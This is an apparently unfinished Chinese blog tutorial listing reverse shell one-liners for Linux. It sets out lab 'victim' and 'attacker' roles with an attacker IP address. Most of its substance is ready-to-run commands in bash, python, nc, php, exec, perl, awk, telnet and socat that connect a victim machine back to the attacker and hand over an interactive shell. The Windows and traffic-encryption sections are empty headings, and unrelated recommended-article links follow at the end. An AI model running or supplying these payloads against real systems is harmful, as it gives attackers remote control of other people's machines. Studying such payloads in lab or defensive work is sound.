反弹shell(未完待续)
文章目录
- 一、前言
- (0)参考文章
- (1)总结思维导图
- (2)个人总结
- 二、Linux常用反弹shell姿势
- (0)实验环境
- (1)bash反弹shell
- (2)python反弹shell
- (3)nc反弹shell
- (4)php反弹shell
- (5)exec反弹shell
- (6)perl反弹shell
- (7)awk反弹shell
- (8)telnet反弹shell
- (8)socat反弹shell
- 三、Windows常用反弹shell姿势
- (0)实验环境
- (1)nc反弹shell
- (2)反弹shell
- (3)反弹shell
- 四、流量加密
一、前言
(0)参考文章
反弹shell
(1)总结思维导图
(2)个人总结
- 亲手去测试总会遇到各种问题,这个问题也可能是玄学问题,那就重启咯。
- 找解决方法时要注意加上系统及其版本,比如docker的安装在Ubuntu不同版本是不太一样的。为了防止入门劝退,最好找个跟自己一样系统版本的解决教程。
- 先动手按照教程去实验一遍,不懂原理可以稍后去了解,不要因为不会就永远停在一个地方。
- 最近看到的两句话
(1)学习的本质是模仿。不会走先学爬,照葫芦画瓢,慢慢积累实战经验。
(2)掌握一门学科所用的时间越短,学习质量就越高,对知识的理解也越深。所以短时间内不要贪多,以致嚼不烂。
二、Linux常用反弹shell姿势
(0)实验环境
CentOS 7(受害者,局域网)
kali (攻击者,局域网)
Ubuntu (攻击者,公网)
使用whereis命令去确定目标主机支持的方法,然后选择相应的shell语句
whereis nc bash python php exec lua perl ruby
(1)bash反弹shell
- 命令
攻击者:nc -lnvp 9999 受害者:bash -i >& /dev/tcp/20.210.90.167/9999 0>&1
- 受害者视角
- 攻击者视角
- 使用公网ip反弹shell
(2)python反弹shell
- 命令
攻击者:nc -lnvp 8080 受害者:python -c "import os,socket,subprocess;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('20.210.90.167',8080));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(['/bin/bash','-i']);"
- 攻击者视角(监听)
- 受害者视角
(3)nc反弹shell
- 命令
攻击者:nc -lnvp 8080 受害者:nc -e /bin/bash 20.210.90.167 8080
- 攻击者视角
- 受害者视角
(4)php反弹shell
- 命令
攻击者:nc -nvlp 8080 受害者:php -r 'exec("/usr/bin/bash -i >& /dev/tcp/20.210.90.167/8080 0>&1");' 受害者:php -r '$sock=fsockopen("20.210.90.167",8080);exec("/bin/bash -i <&3 >&3 2>&3");'
- 出现了小问题
原因:没有安装php,其实上面whereis没有php
解决:网上找CentOS 7的教程安装一个php即可 - 攻击者
- 受害者
- 受害者
(5)exec反弹shell
- 命令
攻击者:nc -nvlp 8080 受害者:0<&196;exec 196<>/dev/tcp/20.210.90.167/8080; sh <&196 >&196 2>&196
- 受害者
- 攻击者
(6)perl反弹shell
- 命令
攻击者:nc -nvlp 8080 受害者:perl -e 'use Socket;$i="20.210.90.167";$p=8080;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
- 受害者
- 攻击者
- 小问题
本来可以的,试了几次都不行,但是用着用着不行了,那就重启试试。
(7)awk反弹shell
- 命令
攻击者:nc -nvlp 8080 受害者:awk 'BEGIN{s="/inet/tcp/0/20.210.90.167/8080";for(;s|&getline c;close(c))while(c|getline)print|&s;close(s)}'
- 受害者
- 攻击者
(8)telnet反弹shell
telnet介绍
Telnet 协议是 Internet 远程登陆服务的标准协议和主要方式。它为用户提供了在本地计算机上完成远程主机工作的能力。在终端使用者的电脑上使用 telnet 程序,用它连接到服务器。终端使用者可以在 telnet 程序中输入命令,这些命令会在服务器上运行,就像直接在服务器的控制台上输入一样。可以在本地就能控制服务器。要开始一个 telnet 会话,必须输入用户名和密码来登录服务器。Telnet 是常用的远程控制 Web 服务器的方法。
命令
攻击者:nc -nvlp 1111 #输入命令 攻击者:nc -nvlp 2222 #输出命令 受害者:telnet 192.168.187.145 1111 | /bin/bash | telnet 192.168.187.145 2222
受害者
攻击者(发送命令)
攻击者(返回结果)
小问题
解决:安装一个telnet
(8)socat反弹shell
socat介绍
Socat 是 Linux 下的一个多功能的网络工具,名字来由是 「Socket CAT」。其功能与有瑞士军刀之称的 Netcat 类似,可以看做是 Netcat 的加强版。
Socat 的主要特点就是在两个数据流之间建立通道,且支持众多协议和链接方式。如 IP、TCP、 UDP、IPv6、PIPE、EXEC、System、Open、Proxy、Openssl、Socket等。命令
攻击者:nc -nvlp 8080 受害者:socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:20.210.90.167:8080
受害者
攻击者
小问题
解决:安装socat
yum install socat -y
三、Windows常用反弹shell姿势
(0)实验环境
Windows 10(受害者,局域网)
kali (攻击者,局域网)
Ubuntu (攻击者,公网)
(1)nc反弹shell
- Windows 下载安装 netcat(nc)命令
- 命令
- 受害者
- 攻击者
(2)反弹shell
- 命令
- 受害者
- 攻击者
(3)反弹shell
- 命令
- 受害者
- 攻击者
四、流量加密
反弹shell(未完待续)相关推荐
- javascript有用小功能总结(未完待续)
1)javascript让页面标题滚动效果 代码如下: <title>您好,欢迎访问我的博客</title> <script type="text/javasc ...
- CTF论剑场(web) write up 未完待续
CTF论剑场(web) write up web26 直接给你一串代码 <?php $num=$_GET['num']; $str=$_GET['str']; show_source(__FIL ...
- 构建Linux根文件系统(未完待续)
所谓制作根文件系统, 就是创建各种目录, 并且在里面创建各种文件. 比如在/bin ./sbin 目录下存放各种可执行程序, 在/etc 目录下存放配置文件, 在/lib 目录下存放库文件 ...
- 《今日简史》读书笔记(未完待续)
<今日简史>读书笔记(未完待续) 这本书是尤瓦尔·赫拉利的简史三部曲的最后一本,前2本书是<未来简史>和<人类简史>.根据豆瓣上网友的评价,这本书是尤瓦尔·赫拉利写 ...
- linux引数列项目过长,Linux 命令个人总结====== 未完待续 个人认为比较重要
Linux 命令个人总结====== 未完待续 man [功能说明]: 查看帮助 [语法格式]: man [123456789]命令.文件. [选项参数]: 数字"1"表示用户命令 ...
- CC2530学习路线-基础实验-串口通讯发送字符串(4 未完待续)
目录 1. 前期预备知识 1.1 串口通讯电路图 1.2 实验相关寄存器 1.2 常用波特率设置 本章未完待续..... 原来写的文章已经丢失了,只能找到这一小部分,看什么时候有时间再补上. 1. 前 ...
- Paper之BigGAN:ICLR 2019最新论文《LARGE SCALE GAN TRAINING FOR HIGH FIDELITY NATURAL IMAGE SYNTHESIS》(未完待续)
Paper之BigGAN:ICLR 2019最新论文<LARGE SCALE GAN TRAINING FOR HIGH FIDELITY NATURAL IMAGE SYNTHESIS> ...
- Windows x64内核学习笔记(五)—— KPTI(未完待续)
Windows x64内核学习笔记(五)-- KPTI(未完待续) KPTI 实验一:构造IDT后门并读取Cr3 参考资料 KPTI 描述:KPTI(Kernel page-table isolati ...
- Ubuntu1804和2004高版本,右键无法创建TXT文档的解决办法【未完待续】
Ubuntu1804和2004高版本,右键无法创建TXT文档的解决办法[未完待续] 问题: Ubuntu1804和2004高版本,右键无法创建TXT文档 解决办法1:[常用] 1.打开终端 2.输入: ...
最新文章
- 汇编语言 循环让字符串中的字母变成大写
- xi mapping function-concat
- 设计一个健壮的大型文件下载系统
- axios nodejs 上传图片_vue项目中使用axios上传图片等文件操作
- java 创建者设计模式_Java设计模式之创建者模式分享热爱编程,程序人生
- 相机标定基础【1】- 在Visual Station 2019 上搭建OpenCV应用 (1)- 安装配置VS
- Centos彻底完全删除已安装软件的办法
- 如何从 ArcView 3.3 版本的工程迁移到 ArcGIS Desktop 10 ?
- JavaWeb框架三剑客前言
- 插拔usb设备计算机管理无反应,usb插上电脑没反应,详细教您浏览修复usb方法
- c++EasyX极乐净土的实现及音乐头文件的使用
- libtorrent源码分析(四)LSD实现
- winstor磁盘阵列数据恢复
- ASN.1入门(超详细)
- MATLA雾霾下的交通标志识别系统[GUI界面]
- c语言编写程序寻找最大公约数,C程序设计编程题库
- PMP知识点:项目经理必备的11种人际关系技能
- 迭代式开发使用方法总结
- 机器学习:从决策树到xgboost
- 电机系统标幺值基准值的选取